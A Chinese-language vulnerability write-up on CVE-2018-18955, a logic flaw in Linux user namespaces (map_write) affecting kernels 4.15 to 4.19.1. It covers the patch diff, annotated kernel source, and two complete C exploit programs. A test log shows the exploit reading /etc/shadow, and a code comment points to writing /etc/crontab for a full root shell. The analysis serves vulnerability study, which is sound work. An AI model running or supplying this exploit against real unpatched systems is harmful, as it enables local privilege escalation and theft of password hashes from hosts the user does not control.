【kernel exploit】CVE-2018-18955 用户命名空间逻辑错误

仲孙夕

2023-12-01

影响版本：Linux 4.15.x~4.19.2 4.19.2已修补，4.19.1未修补。 7.0分。

测试版本：Linux-4.19.1 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项：CONFIG_USER_NS CONFIG_SLAB=y

General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB

在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.19.1.tar.xz
$ tar -xvf linux-4.19.1.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录：/arch/x86/boot/bzImage。

漏洞描述：kernel/user_namespace.c中的 map_write() 错误处理了嵌套的user namespace（长度超过5个UID或GID），如果用户有CAP_SYS_ADMIN权限，就能绕过访问控制，访问到namespace之外的资源，例如/etc/shadow。

map_write() 的功能是根据用户输入的映射关系和父NS的权限来确定当前NS的映射关系。首先，用户通过/proc/self/uid_map来设置映射关系（每一行用一个 uid_gid_extent 结构来存储），然后map_write() 会先对输入的这些 uid_gid_extent 进行排序，然后用父ns的权限来更新用户设置的映射关系（保证进程所具有的权限不会超过父ns的权限），关键是在排序时还复制了一个数组 map->reverse，但更新权限时只更新了 map->forward，导致后续别的函数通过 map->reverse 来判断权限时出错。 user namespace逻辑漏洞。

补丁：patch 如果先调用 sort_idmaps() 进行排序，会产生两种排序的数组 map->forward 和 map->reverse （reverse是对forward的拷贝后的排序），之后的循环只更新了 map->forward；所以补丁作的修改是，在循环修改了 map->forward 之后再调用 sort_idmaps() 进行排序，这样 map->reverse 就是修改后的版本。

diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5fb4fe6..923414a246e9e 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
 	if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
 		goto out;
 
-	ret = sort_idmaps(&new_map);
-	if (ret < 0)
-		goto out;
-
 	ret = -EPERM;
 	/* Map the lower ids from the parent user namespace to the
 	 * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
 		e->lower_first = lower_first;
 	}
 
+	/*
+	 * If we want to use binary search for lookup, this clones the extent
+	 * array and sorts both copies.
+	 */
+	ret = sort_idmaps(&new_map);
+	if (ret < 0)
+		goto out;
+
 	/* Install the map */
 	if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
 		memcpy(map->extent, new_map.extent,

保护机制：开启KASLR/SMEP/SMAP。

利用总结：由于必须安装，所以我无法在自己编译的bzimage中进行测试。如果有办法在busybox文件系统中安装uidmap，就能进行测试。方法就是利用漏洞构造root权限，读取/etc/shadow。

一、背景知识

用户命名空间：用于隔离安全相关的标识符和属性的名称空间，主要是uid、gid、根目录、密钥、capacity。一个进程的在自己的用户命名空间内可以是高权限，在命名空间外是低权限。嵌套用户命名空间，就是一个 user namespace 的子 namespace。本漏洞利用创建 nested user namespace 时错误的id映射来达到提权目的。

uid/gid映射：该机制保证了 nested user namespace 中，进程所具有的权限不会逾越父ns的范围。man newuidmap得到如下内容：

uid：用户命名空间内UIDs范围的开头。
loweruid：用户命名空间外的UIDs范围的开头。
count：用户命名空间内外的范围的长度。

向 /proc/<pid>/uid_map 和 /proc/<pid>/gid_map 文件写入值，就能映射系统和namespace中的uid/gid。第1个字段ID-inside-ns表示在命名空间内的UID或GID；第2个字段ID-outside-ns表示在命名空间外的真实UID或GID；第3个字段表示映射的范围，一般填1，表示一一对应。每一行id映射都用一个 uid_gid_extent 结构表示。

# 示例: 把真实的uid=1000映射成容器内的uid=0
$ cat /proc/2465/uid_map
0       1000          1

写入限制：

在linux4.14之前只能写入5行，在4.15之后，可以达到340行；
写这两个文件的进程需要这个namespace中的CAP_SETUID (CAP_SETGID)权限（可参看Capabilities）；
写入的进程必须是此user NS的父或子的user NS进程；
另外需要满如下条件之一：1）父进程将effective uid/gid映射到子进程的user NS中，2）父进程如果有CAP_SETUID/CAP_SETGID权限，那么它将可以映射到父进程中的任一uid/gid。

loweruid 限制：newuidmap 验证caller是pid指示的进程的所有者，设置/proc/[pid]/uid_map前，根据 /etc/subuid，[loweruid, loweruid+count]范围内的UID都能映射。

# john @ john-XPS-13-9360 in ~
$ cat /etc/subuid
john:100000:65536
# 所以我可以创建像 0 100000 1000这样的mapping

二、漏洞分析

调用链：proc_uid_map_write() -> map_write() -> mappings_overlap() insert_extent() sort_idmaps() map_id_range_down() ->

// 确认是 /proc/<pid>/uid_map 文件写操作的实现
// https://elixir.bootlin.com/linux/v4.19.1/source/fs/proc/base.c#L2814
// 本文件后面还有一句  REG("uid_map",    S_IRUGO|S_IWUSR, proc_uid_map_operations)
static const struct file_operations proc_uid_map_operations = {
	.open		= proc_uid_map_open,
	.write		= proc_uid_map_write,			// <----------
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= proc_id_map_release,
};

2.1 源码分析

// (1) proc_uid_map_write()
ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
			   size_t size, loff_t *ppos)
{
	struct seq_file *seq = file->private_data;
	struct user_namespace *ns = seq->private;
	struct user_namespace *seq_ns = seq_user_ns(seq);

	if (!ns->parent)
		return -EPERM;

	if ((seq_ns != ns) && (seq_ns != ns->parent))
		return -EPERM;

	return map_write(file, buf, size, ppos, CAP_SETUID,			// <--------- 后两个参数分别为命名空间的udi_map和父命名空间的uid_map。新建命名空间需要clone新进程，传入特定参数。
			 &ns->uid_map, &ns->parent->uid_map);
}
// struct user_namespace  ->  struct uid_gid_map	uid_map;	map的定义如下，uid_gid_extent的定义正好是符合 /proc/<pid>/uid_map等的文件格式。Linux中4.14之前，这个极限被(任意地)设为5行；Linux 4.15之后，限制是340行。  当数据行数在5之内的时候，直接写在extent里面，当大于5的时候，放在forward指向的位置。
struct uid_gid_map { /* 64 bytes -- 1 cache line */
	u32 nr_extents;
	union {
		struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
		struct {
			struct uid_gid_extent *forward;
			struct uid_gid_extent *reverse;
		};
	};
};
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent {			// 每个 uid_gid_extent 代表一行 id映射
    u32 first;
    u32 lower_first;
    u32 count;
};

// (2) map_write()
static ssize_t map_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos,
			 int cap_setid,
			 struct uid_gid_map *map,	// 参数map是当前命名空间的 uid_gid_map 。根据用户输入的buf（/proc/self/uid_map中）和parent_map来确定当前命名空间的map。
			 struct uid_gid_map *parent_map)
{
	struct seq_file *seq = file->private_data;
	struct user_namespace *ns = seq->private;
	struct uid_gid_map new_map;
	unsigned idx;
	struct uid_gid_extent extent;
	char *kbuf = NULL, *pos, *next_line;
	ssize_t ret;

	/* Only allow < page size writes at the beginning of the file */
	if ((*ppos != 0) || (count >= PAGE_SIZE))
		return -EINVAL;

	/* Slurp in the user data */
	kbuf = memdup_user_nul(buf, count);			// [1] kbuf —— 内核中分配一块内存，将用户态数据拷贝进去
	if (IS_ERR(kbuf))
		return PTR_ERR(kbuf);

	/*
	 * The userns_state_mutex serializes all writes to any given map.
	 *
	 * Any map is only ever written once.
	 *
	 * An id map fits within 1 cache line on most architectures.
	 *
	 * On read nothing needs to be done unless you are on an
	 * architecture with a crazy cache coherency model like alpha.
	 *
	 * There is a one time data dependency between reading the
	 * count of the extents and the values of the extents.  The
	 * desired behavior is to see the values of the extents that
	 * were written before the count of the extents.
	 *
	 * To achieve this smp_wmb() is used on guarantee the write
	 * order and smp_rmb() is guaranteed that we don't have crazy
	 * architectures returning stale data.
	 */
	mutex_lock(&userns_state_mutex);

	memset(&new_map, 0, sizeof(struct uid_gid_map));

	ret = -EPERM;
	/* Only allow one successful write to the map */
	if (map->nr_extents != 0)
		goto out;

	/*
	 * Adjusting namespace settings requires capabilities on the target.
	 */
	if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
		goto out;

	/* Parse the user data */
	ret = -EINVAL;
	pos = kbuf;
	for (; pos; pos = next_line) {				// [2] 不断按行解析出用户输入数据，存放进extent。然后调用两个关键的函数，mappings_overlap() 和 insert_extent()。

		/* Find the end of line and ensure I don't look past it */
		next_line = strchr(pos, '\n');
		if (next_line) {
			*next_line = '\0';
			next_line++;
			if (*next_line == '\0')
				next_line = NULL;
		}

		pos = skip_spaces(pos);
		extent.first = simple_strtoul(pos, &pos, 10);
		if (!isspace(*pos))
			goto out;

		pos = skip_spaces(pos);
		extent.lower_first = simple_strtoul(pos, &pos, 10);
		if (!isspace(*pos))
			goto out;

		pos = skip_spaces(pos);
		extent.count = simple_strtoul(pos, &pos, 10);
		if (*pos && !isspace(*pos))
			goto out;

		/* Verify there is not trailing junk on the line */
		pos = skip_spaces(pos);
		if (*pos != '\0')
			goto out;

		/* Verify we have been given valid starting values */
		if ((extent.first == (u32) -1) ||
		    (extent.lower_first == (u32) -1))
			goto out;

		/* Verify count is not zero and does not cause the
		 * extent to wrap
		 */
		if ((extent.first + extent.count) <= extent.first)
			goto out;
		if ((extent.lower_first + extent.count) <=
		     extent.lower_first)
			goto out;

		/* Do the ranges in extent overlap any previous extents? */
		if (mappings_overlap(&new_map, &extent))	// [2-1] mappings_overlap() 用来检测 uid_gid_extent 和 uid_gid_map 有没有重叠的部分，有就返回true。也即检查 new_map 中是否已有 extent。
			goto out;

		if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
		    (next_line != NULL))
			goto out;

		ret = insert_extent(&new_map, &extent);		// [2-2] insert_extent() 用来向 uid_gid_map 中插入一个 uid_gid_extent。
		if (ret < 0)
			goto out;
		ret = -EINVAL;
	}
	/* Be very certaint the new map actually exists */
	if (new_map.nr_extents == 0)		// 之前的操作都是用来拷贝输入数据，做一些检查工作，最终的输入数据都放在 new_map 中。
		goto out;

	ret = -EPERM;
	/* Validate the user is allowed to use user id's mapped to. */
	if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
		goto out;

	ret = sort_idmaps(&new_map);			// [3] sort_idmaps(): 排序, uid_gid_extent 个数大于5 才进行排序；同时 kmemdup() 还复制了一份，进行逆向排序，结果放在 map->reverse 处。
	if (ret < 0)
		goto out;

	ret = -EPERM;
	/* Map the lower ids from the parent user namespace to the
	 * kernel global id space.
	 */
	for (idx = 0; idx < new_map.nr_extents; idx++) { 	// [4] 用 parent_map->lower_first 替代 new_map->lowerfirst, new_map 就是我们要建立的嵌套命名空间，lower_first 就是父ns的起始id。遍历输入数据，调用 map_id_range_down() 函数。
		struct uid_gid_extent *e;
		u32 lower_first;

		if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
			e = &new_map.extent[idx];
		else
			e = &new_map.forward[idx];					

		lower_first = map_id_range_down(parent_map,		// [4-1] 参数1表示父命名空间的 uid_gid_map，参数2、3表示父命名空间的起始位置和范围。
						e->lower_first,
						e->count);

		/* Fail if we can not map the specified extent to
		 * the kernel global id space.
		 */
		if (lower_first == (u32) -1)
			goto out;

		e->lower_first = lower_first;					// [4-2] 更新new_map中对应uid_gid_extent的lower_first字段。 		// 漏洞点!!!!!!!!!!!!!!!! new_map->forward的lower_first id已经更新，但new_map->reverse的却没有改变。
	}

	/* Install the map */
	if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {	// [5] 写回。参数map是当前命名空间的 uid_gid_map，new_map是新建的，这部分的工作就是将new_map写回到map中（这个proc文件只能被写入一次，并且初始的时候是空的）。最后做了一些错误处理。
		memcpy(map->extent, new_map.extent,
		       new_map.nr_extents * sizeof(new_map.extent[0]));
	} else {
		map->forward = new_map.forward;
		map->reverse = new_map.reverse;
	}
	smp_wmb();
	map->nr_extents = new_map.nr_extents;

	*ppos = count;
	ret = count;
out:
	if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
		kfree(new_map.forward);
		kfree(new_map.reverse);
		map->forward = NULL;
		map->reverse = NULL;
		map->nr_extents = 0;
	}

	mutex_unlock(&userns_state_mutex);
	kfree(kbuf);
	return ret;
}

// (2-1) mappings_overlap() —— 遍历uid_gid_map，取出每个uid_gid_extent，然后和extent进行比较，包括区间的上界和下界，同时可以看到当nr_extent大于5的时候，会指向forword指向的uid_gid_extent
static bool mappings_overlap(struct uid_gid_map *new_map,
                 struct uid_gid_extent *extent);
// (2-2) insert_extent() —— 如果插入下标为5，则分配340个 uid_gid_extent 结构大小的内存，然后将前5个 uid_gid_extent 拷贝到该内存。然后将extent加入到末尾，总个数 map->nr_extents 加 1。
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent);

// (3) map_id_range_down()
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
	struct uid_gid_extent *extent;
	unsigned extents = map->nr_extents;
	smp_rmb();

	if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
		extent = map_id_range_down_base(extents, map, id, count);
	else
		extent = map_id_range_down_max(extents, map, id, count);	// [1] 直接调用 map_id_range_down_max(), 该函数是一个二分搜索的封装，在父命名空间中找一个 uid_gid_extent, 而这个 uid_gid_extent 的 [first,first+count-1] 包含了子命名空间想映射的区间。

	/* Map the id or note failure */
	if (extent)				// [2] 取得这个uid_gid_extent之后，利用这个uid_gid_extent区更新了id并返回，这个id是子命名空间中uid_gid_extent的lower_first字段，也就是想映射的父命名空间的起始位置。下面这句话将id的值更新为父命名空间的位置，由于所有的命名空间都是由一个根命名空间，一步一步嵌套下来，所以这个值最终代表的是整个系统中的uid值。
		id = (id - extent->first) + extent->lower_first;
	else
		id = (u32) -1;

	return id;
}

2.2 漏洞分析

排序：前面的 sort_idmaps() 函数中（ map_write() 的[3]处），当数据数目大于5时，还创建了一个 map->reverse 的副本，进行了排序，之后就没再更改过，最后将这个内存地址赋值给了map。

这两种排序方式的区别：forward是用uid_gid_extent->first字段来进行排序，而reverse是利用uid_gid_extent->lower_first字段进行排序。

static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->first < e2->first)
        return -1;

    if (e1->first > e2->first)
        return 1;

    return 0;
}

/* cmp function to sort() reverse mappings */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->lower_first < e2->lower_first)
        return -1;

    if (e1->lower_first > e2->lower_first)
        return 1;

    return 0;
}

漏洞：在前面调用 map_id_range_down() 的for循环中，更新了 e->lower_first 的值，而e是通过forward来找到的，所以说最终只是更新了forward中的值，而reverse中的值没有被更改，所以说这个reverse中的值是用户传进来的，如果先有一个命名空间n1，映射自己的root进程到kernel的普通进程，然后n1再创建一个名称空间n2，而将n1的root权限映射到n2的root权限，这样在n2中的uid_map中，forword指向的uid_gid_extent的第2项被更改了，但是reverse指向的没有被更改，还保持root到root的映射，所以通过这个reverse来判断的uid就会出现权限提升了。

然后就是这个reverse的链表到底在哪里被用到，并且是用来干嘛的？

根据作者的介绍，在user_namespaces中对reverse这个变量的引用在from_kuid()函数中，被kuid_has_mapping() 判断是否被映射，后者接着又被类似于 inode_owner_or_capable() 和 privileged_wrt_inode_uidgid()这样的权限检查函数所使用。就是说，内核在获取这个进程的实际权限的时候，需要使用reverse。假设这样一个场景，当一个容器中的进程访问文件的时候，需要判断该进程是不是有权限，当文件是在命名空间之内的时候，则需要查看进程在容器内的权限，所以要通过内核的pid去找到进程的pid。

关于kuid_has_mapping()的使用方法其实可以参考unshare的实现，代码从unshare的系统调用服务例程开始，调用流程如下

1、kernel/fork.c/SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)

2、kernel/user_namespaces.c/unshare_userns

3、kernel/user_namespaces.c/create_user_ns

4、kernel/user_namespaces.c/kuid_has_mapping

三、漏洞利用

引用map->reverse调用链：privileged_wrt_inode_uidgid() -> kgid_has_mapping() -> from_kgid() -> map_id_up() -> map_id_up_max() -> map->reverse 在这种权限检查函数中， from_kgid() 返回错误的id，造成权限检查的错误，因此攻击者可以以外得到他们本来没有权限的inode的权限。

利用EXP：第一部分是 subuid_shell.c，这是一个普通的unshare函数来创建一个新的名空间，主要流程如下：

1、父进程fork子进程，之后子进程等待，父进程调用unshare创建一个新的名称空间

2、父进程创建新的名称空间后等待，子进程写入uid_map等文件，设立映射条件

3、子进程等待，父进程调用sh

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

然后是 subshell.c ，主要流程同上，只是子进程写入映射的数据不同，为什么是这些数据可以参考前面的漏洞分析部分。

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of uid_map
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/pid/uid_map
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

测试：在Ubuntu 18.04 上进行测试，因为QEMU中制作文件系统时无法安装uidmap。需安装"uidmap" 包，目标是读取 /etc/shadow。

$ sudo apt-get install uidmap		# 这样就包含/usr/bin/mewuidmap 和 /usr/bin/mewgidmap
$ cat /etc/subuid			# john:100000:65536
$ cat /etc/subgid			# john:100000:65536
$ gcc -o subuid_shell subuid_shell.c	# subuid_shell.c 使用newuidmap helper来设置一个ns，maps 1000 UIDs starting at 100000 to the namespaced UID 0； 
$ gcc -o subshell subshell.c		# subshell.c 需要 CAP_SYS_ADMIN 权限，创建一个user ns，使用6个 extent 来 maps UIDs 0-999
$ id 				# 1000普通权限
$ ./subuid_shell 
# id 				# 提权
	uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
# cat /proc/self/uid_map		# 0     100000       1000
	     0     100000       1000
# cat /etc/shadow			# 无权限读取
	cat: /etc/shadow: Permission denied
# ./subshell 
$ id
	uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
$ cat /proc/self/uid_map		# 5行
$ cat /etc/shadow 			# 可以读取
	root:!:18102:0:99999:7:::

参考

exploit

CVE-2018-18955：较新Linux内核的提权神洞分析

CVE-2018-18955漏洞学习

【kernel exploit】CVE-2018-18955 用户命名空间逻辑错误

一、背景知识

二、漏洞分析

2.1 源码分析

2.2 漏洞分析

三、漏洞利用

参考

相关阅读

相关文章

相关问答

相关文档